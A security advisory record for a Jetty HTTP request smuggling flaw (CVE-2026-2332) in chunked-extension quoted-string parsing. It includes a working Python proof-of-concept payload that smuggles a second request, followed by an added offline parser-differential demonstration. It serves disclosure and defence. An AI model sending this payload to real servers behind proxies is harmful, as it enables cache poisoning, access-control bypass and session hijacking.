{"id":"GHSA-355h-qmc2-wpwf","summary":"Jetty has HTTP Request Smuggling via Chunked Extension Quoted-String Parsing","details":"### Description (as reported)\n\nJetty incorrectly parses quoted strings in HTTP/1.1 chunked transfer encoding extension values, enabling request smuggling attacks.\n\n### Background\n\nThis vulnerability is a new variant discovered while researching the \"Funky Chunks\" HTTP request smuggling techniques:\n- https://w4ke.info/2025/06/18/funky-chunks.html\n- https://w4ke.info/2025/10/29/funky-chunks-2.html\n\nThe original research tested various chunk extension parsing differentials but did not test quoted-string handling within extension values.\n\n### Technical Details\n\n**RFC 9112 Section 7.1.1** defines chunked transfer encoding:\n```\nchunk = chunk-size [ chunk-ext ] CRLF chunk-data CRLF\nchunk-ext = *( BWS \";\" BWS chunk-ext-name [ BWS \"=\" BWS chunk-ext-val ] )\nchunk-ext-val = token / quoted-string\n```\n\n**RFC 9110 Section 5.6.4** defines quoted-string:\n```\nquoted-string = DQUOTE *( qdtext / quoted-pair ) DQUOTE\n```\n\nA quoted-string continues until the closing DQUOTE; CR and LF are not qdtext, so a `\\r\\n` sequence is not permitted within the quotes.\n\n### Vulnerability\n\nJetty terminates chunk header parsing at the first `\\r\\n` even when it occurs inside a quoted string, instead of treating that CRLF as a parsing error. A front-end that honours the quote boundary therefore frames the body differently from Jetty; that parser differential is what enables the smuggling.\n\n**Expected (quote boundary honoured; a strict parser rejects the request outright):**\n```\nChunk: 1;a=\"value\\r\\nhere\"\\r\\n\n         ^^^^^^^^^^^^^^^^^^ extension value\nBody: [1 byte after the real \\r\\n]\n```\n\n**Actual (jetty):**\n```\nChunk: 1;a=\"value\n            ^^^^^ terminates here (WRONG)\nBody: here\"... treated as body/next request\n```\n\n### Proof of Concept\n\n```python\n#!/usr/bin/env python3\nimport socket\n\n# Constructed request: Jetty stops parsing the first chunk header at the CRLF\n# that follows the opening DQUOTE of a=\"..., so it sees chunk \"X\", a 0 chunk,\n# and then GET /smuggled as a second request. A parser that honours the quote\n# boundary sees one POST whose only chunk is \"Y\".\npayload = (\n    b\"POST / HTTP/1.1\\r\\n\"\n    b\"Host: localhost\\r\\n\"\n    b\"Transfer-Encoding: chunked\\r\\n\"\n    b\"\\r\\n\"\n    b'1;a=\"\\r\\n'\n    b\"X\\r\\n\"\n    b\"0\\r\\n\"\n    b\"\\r\\n\"\n    b\"GET /smuggled HTTP/1.1\\r\\n\"\n    b\"Host: localhost\\r\\n\"\n    b\"Content-Length: 11\\r\\n\"\n    b\"\\r\\n\"\n    b'\"\\r\\n'\n    b\"Y\\r\\n\"\n    b\"0\\r\\n\"\n    b\"\\r\\n\"\n)\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.settimeout(3)\nsock.connect((\"127.0.0.1\", 8080))\nsock.sendall(payload)\n\n# Read until the server goes quiet, then count response status lines.\nresponse = b\"\"\nwhile True:\n    try:\n        chunk = sock.recv(4096)\n        if not chunk:\n            break\n        response += chunk\n    except socket.timeout:\n        break\n\nsock.close()\nprint(f\"Responses: {response.count(b'HTTP/')}\")\nprint(response.decode(errors=\"replace\"))\n```\n\n**Result:** A vulnerable Jetty returns 2 HTTP responses on a single TCP connection, the second one for `GET /smuggled`.\n\n#### Parsing Breakdown\n\n| Parser | Request 1 | Request 2 |\n|--------|-----------|-----------|\n| jetty (vulnerable) | POST / body=\"X\" | GET /smuggled (SMUGGLED!) |\n| quote boundary honoured (e.g. a front-end proxy) | POST / body=\"Y\" | (none - smuggled request hidden in the extension value) |\n| strict RFC 9110 | rejected (CRLF inside quoted-string) | (none) |\n\n### Impact\n\n- **Request Smuggling**: an attacker injects arbitrary HTTP requests behind a front-end that frames the body by the quote boundary\n- **Cache Poisoning**: responses to smuggled requests can poison shared caches\n- **Access Control Bypass**: smuggled requests bypass front-end security controls that never see them\n- **Session Hijacking**: smuggled requests can capture other users' responses on a shared connection\n\n### Reproduction\n\n1. Start the minimal POC with docker\n2. Run the poc script provided in the same zip\n\n### Suggested Fix\n\nParse chunk framing and extensions exactly as specified in RFC 9112. A CRLF inside a quoted-string should be treated as a parsing error (reject the request), not as a line terminator.\n\n### Patches\n\nFixed in jetty-http 12.1.7 and 12.0.33 (see the affected ranges in this record); no fixed version is listed here for the 9.4.x, 10.0.x and 11.0.x lines.\n\n### Workarounds\n\nNo workarounds yet.\n\n### References\n\n- RFC 9110: HTTP Semantics, Section 5.6.4 (quoted-string)\n- RFC 9112: HTTP/1.1, Section 7.1.1 (chunked transfer coding)\n- Funky Chunks Research: https://w4ke.info/2025/06/18/funky-chunks.html\n- Jetty security page (fixed versions): https://jetty.org/security.html","aliases":["CVE-2026-2332"],"modified":"2026-05-20T00:45:27.457940177Z","published":"2026-04-14T23:40:31Z","related":["CGA-5h9p-26x9-27gj"],"database_specific":{"github_reviewed":true,"github_reviewed_at":"2026-04-14T23:40:31Z","nvd_published_at":"2026-04-14T12:16:21Z","cwe_ids":["CWE-444"],"severity":"HIGH"},"references":[{"type":"WEB","url":"https://github.com/jetty/jetty.project/security/advisories/GHSA-355h-qmc2-wpwf"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-2332"},{"type":"PACKAGE","url":"https://github.com/jetty/jetty.project"},{"type":"WEB","url":"https://gitlab.eclipse.org/security/cve-assignment/-/issues/89"},{"type":"WEB","url":"https://w4ke.info/2025/06/18/funky-chunks.html"}],"affected":[{"package":{"name":"org.eclipse.jetty:jetty-http","ecosystem":"Maven","purl":"pkg:maven/org.eclipse.jetty/jetty-http"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"12.1.0"},{"fixed":"12.1.7"}]}],"versions":["12.1.0","12.1.1","12.1.2","12.1.3","12.1.4","12.1.5","12.1.6"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-355h-qmc2-wpwf/GHSA-355h-qmc2-wpwf.json","last_known_affected_version_range":"\u003c= 12.1.6"}},{"package":{"name":"org.eclipse.jetty:jetty-http","ecosystem":"Maven","purl":"pkg:maven/org.eclipse.jetty/jetty-http"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"12.0.0"},{"fixed":"12.0.33"}]}],"versions":["12.0.0","12.0.1","12.0.10","12.0.11","12.0.12","12.0.13","12.0.14","12.0.15","12.0.16","12.0.17","12.0.18","12.0.19","12.0.2","12.0.20","12.0.21","12.0.22","12.0.23","12.0.24","12.0.25","12.0.26","12.0.27","12.0.28","12.0.29","12.0.3","12.0.30","12.0.31","12.0.32","12.0.4","12.0.5","12.0.6","12.0.7","12.0.8","12.0.9"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-355h-qmc2-wpwf/GHSA-355h-qmc2-wpwf.json","last_known_affected_version_range":"\u003c= 12.0.32"}},{"package":{"name":"org.eclipse.jetty:jetty-http","ecosystem":"Maven","purl":"pkg:maven/org.eclipse.jetty/jetty-http"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"11.0.0"},{"last_affected":"11.0.27"}]}],"versions":["11.0.0","11.0.1","11.0.10","11.0.11","11.0.12","11.0.13","11.0.14","11.0.15","11.0.16","11.0.17","11.0.18","11.0.19","11.0.2","11.0.20","11.0.21","11.0.22","11.0.23","11.0.24","11.0.25","11.0.26","11.0.3","11.0.4","11.0.5","11.0.6","11.0.7","11.0.8","11.0.9"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-355h-qmc2-wpwf/GHSA-355h-qmc2-wpwf.json"}},{"package":{"name":"org.eclipse.jetty:jetty-http","ecosystem":"Maven","purl":"pkg:maven/org.eclipse.jetty/jetty-http"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"10.0.0"},{"last_affected":"10.0.27"}]}],"versions":["10.0.0","10.0.1","10.0.10","10.0.11","10.0.12","10.0.13","10.0.14","10.0.15","10.0.16","10.0.17","10.0.18","10.0.19","10.0.2","10.0.20","10.0.21","10.0.22","10.0.23","10.0.24","10.0.25","10.0.26","10.0.3","10.0.4","10.0.5","10.0.6","10.0.7","10.0.8","10.0.9"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-355h-qmc2-wpwf/GHSA-355h-qmc2-wpwf.json"}},{"package":{"name":"org.eclipse.jetty:jetty-http","ecosystem":"Maven","purl":"pkg:maven/org.eclipse.jetty/jetty-http"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"9.4.0"},{"last_affected":"9.4.59"}]}],"versions":["9.4.0.v20161208","9.4.0.v20180619","9.4.1.v20170120","9.4.1.v20180619","9.4.10.RC0","9.4.10.RC1","9.4.10.v20180503","9.4.11.v20180605","9.4.12.RC0","9.4.12.RC1","9.4.12.RC2","9.4.12.v20180830","9.4.13.v20181111","9.4.14.v20181114","9.4.15.v20190215","9.4.16.v20190411","9.4.17.v20190418","9.4.18.v20190429","9.4.19.v20190610","9.4.2.v20170220","9.4.2.v20180619","9.4.20.v20190813","9.4.21.v20190926","9.4.22.v20191022","9.4.23.v20191118","9.4.24.v20191120","9.4.25.v20191220","9.4.26.v20200117","9.4.27.v20200227","9.4.28.v20200408","9.4.29.v20200521","9.4.3.v20170317","9.4.3.v20180619","9.4.30.v20200611","9.4.31.v20200723","9.4.32.v20200930","9.4.33.v20201020","9.4.34.v20201102","9.4.35.v20201120","9.4.36.v20210114","9.4.37.v20210219","9.4.38.v20210224","9.4.39.v20210325","9.4.4.v20170414","9.4.4.v20180619","9.4.40.v20210413","9.4.41.v20210516","9.4.42.v20210604","9.4.43.v20210629","9.4.44.v20210927","9.4.45.v20220203","9.4.46.v20220331","9.4.47.v20220610","9.4.48.v20220622","9.4.49.v20220914","9.4.5.v20170502","9.4.5.v20180619","9.4.50.v20221201","9.4.51.v20230217","9.4.52.v20230823","9.4.53.v20231009","9.4.54.v20240208","9.4.55.v20240627","9.4.56.v20240826","9.4.57.v20241219","9.4.58.v20250814","9.4.6.v20170531","9.4.6.v20180619","9.4.7.RC0","9.4.7.v20170914","9.4.7.v20180619","9.4.8.v20171121","9.4.8.v20180619","9.4.9.v20180320"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-355h-qmc2-wpwf/GHSA-355h-qmc2-wpwf.json"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"}]}
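The advisory's "Parsing Breakdown" table is the whole vulnerability: the same bytes framed three ways. The following added example (not Jetty's code and not the reporter's PoC) replays the PoC body offline through three toy chunk-header parsers so the differential can be seen without a server. The mode names `lenient`, `quoted` and `strict` are labels chosen here; `lenient` models the reported Jetty behaviour, `quoted` the quote-boundary parser the table calls RFC compliant, and `strict` a parser that applies RFC 9110's qdtext rule and rejects CR/LF inside the quotes. The body bytes are constructed from the advisory's PoC payload.

```python
#!/usr/bin/env python3
"""Chunk-header framing differential behind GHSA-355h-qmc2-wpwf, replayed
offline. Added example; not Jetty's code. Mode names are ours:
  "lenient" - reported Jetty behaviour: the first CRLF ends the header even
              inside a quoted-string, so a 1-byte chunk "X" follows.
  "quoted"  - honours the DQUOTE boundary and tolerates the CRLF inside it
              (what the advisory's table calls RFC compliant; body "Y").
  "strict"  - RFC 9110 5.6.4: CR/LF are not qdtext, so the request is rejected.
"""

HEX_DIGITS = b"0123456789abcdefABCDEF"

# Constructed from the advisory's PoC: the chunked body after the POST headers.
POC_BODY = (
    b'1;a="\r\n' b"X\r\n"
    b"0\r\n" b"\r\n"
    b"GET /smuggled HTTP/1.1\r\n" b"Host: localhost\r\n"
    b"Content-Length: 11\r\n" b"\r\n"
    b'"\r\n' b"Y\r\n"
    b"0\r\n" b"\r\n"
)


class FramingError(ValueError):
    """The chunk framing is invalid and the request must be rejected."""


def chunk_header_end(buf: bytes, mode: str) -> int:
    """Offset just past the CRLF that terminates the chunk header at buf[0:]."""
    if mode == "lenient":
        end = buf.find(b"\r\n")  # Jetty: the first CRLF wins, quotes or not
        if end < 0:
            raise FramingError("chunk header not terminated")
        return end + 2
    in_quotes = False
    i = 0
    while i < len(buf):
        c = buf[i]
        if in_quotes:
            if c == 0x5C:  # backslash: quoted-pair, the next byte is literal
                i += 2
                continue
            if c == 0x22:  # closing DQUOTE
                in_quotes = False
            elif c in (0x0D, 0x0A) and mode == "strict":
                raise FramingError("CR/LF inside chunk-ext quoted-string")
        elif c == 0x22:  # opening DQUOTE of a chunk-ext-val
            in_quotes = True
        elif buf.startswith(b"\r\n", i):
            return i + 2
        elif c in (0x0D, 0x0A):
            raise FramingError("bare CR or LF in chunk header")
        i += 1
    raise FramingError("chunk header not terminated")


def chunk_size(buf: bytes) -> int:
    """Parse the leading 1*HEXDIG chunk-size."""
    n = 0
    while n < len(buf) and buf[n] in HEX_DIGITS:
        n += 1
    if n == 0:
        raise FramingError("missing chunk-size")
    return int(buf[:n], 16)


def decode_chunked(stream: bytes, mode: str) -> tuple[bytes, bytes]:
    """Decode one chunked body from stream[0:]; return (body, leftover).
    The leftover is what the server would parse as the next request."""
    body = bytearray()
    pos = 0
    while True:
        size = chunk_size(stream[pos:])
        pos += chunk_header_end(stream[pos:], mode)
        if size == 0:  # last-chunk; only an empty trailer section is modelled
            if not stream.startswith(b"\r\n", pos):
                raise FramingError("bad trailer section")
            return bytes(body), stream[pos + 2:]
        data = stream[pos:pos + size]
        if len(data) < size:
            raise FramingError("truncated chunk-data")
        body += data
        pos += size
        if not stream.startswith(b"\r\n", pos):
            raise FramingError("chunk-data not followed by CRLF")
        pos += 2


def framing_report(stream: bytes = POC_BODY) -> dict:
    """Per mode: (body, first line of the leftover) or a rejection string."""
    report = {}
    for mode in ("lenient", "quoted", "strict"):
        try:
            body, rest = decode_chunked(stream, mode)
            report[mode] = (body, rest.split(b"\r\n", 1)[0])
        except FramingError as exc:
            report[mode] = f"rejected: {exc}"
    return report


if __name__ == "__main__":
    for mode, result in framing_report().items():
        print(f"{mode:8s} -> {result!r}")
```

Running it shows the table's rows as data: `lenient` yields body `X` with `GET /smuggled HTTP/1.1` left over as a second request, `quoted` yields body `Y` and nothing left over, and `strict` refuses the request at the first CR inside the quotes. When assessing a deployment, the pair that matters is the front-end's framing versus Jetty's; if the front-end behaves like `quoted` and Jetty like `lenient`, the smuggled request reaches Jetty without the front-end ever inspecting it.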